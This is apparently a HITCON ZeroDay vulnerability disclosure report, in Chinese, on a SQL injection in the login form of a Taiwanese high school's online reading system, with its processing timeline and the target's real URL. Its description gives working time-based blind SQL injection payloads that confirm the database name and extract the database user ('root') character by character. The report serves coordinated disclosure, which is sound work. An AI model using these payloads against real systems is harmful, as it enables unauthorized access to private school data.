Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2017-01224
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 啟英高中線上閱讀認證系統 SQL Injection
- Introduction: SQL Injection
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2017/12/15 21:09:05 : 新提交 (由 K4iBr0 更新此狀態)
- 2017/12/15 21:12:15 : 新提交 (由 K4iBr0 更新此狀態)
- 2017/12/16 00:09:16 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/12/25 17:07:28 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2017/12/25 17:07:29 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/02/14 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2017-01224
- 通報者:Kaibro (K4iBr0)
- 風險:中
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://210.59.41.38/e-cyvs/main.php
敘述
登入表單可以Blind Time-Based SQL injection
Payload:user_id=a' AND (SELECT * FROM (SELECT sleep(5))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (database()='school',sleep(10),1))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (ascii(mid(user(),1,1))>70,sleep(5),1))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (ascii(mid(user(),1,1))=114,sleep(5),1))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (ascii(mid(user(),2,1))=111,sleep(3),1))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (ascii(mid(user(),3,1))=111,sleep(3),1))a) AND 'a'='a&user_password=buser_id=a' AND (SELECT * FROM (SELECT if (ascii(mid(user(),4,1))=116,sleep(3),1))a) AND 'a'='a&user_password=b
=> root
....(略)
可Time-based二分搜爆資料庫內容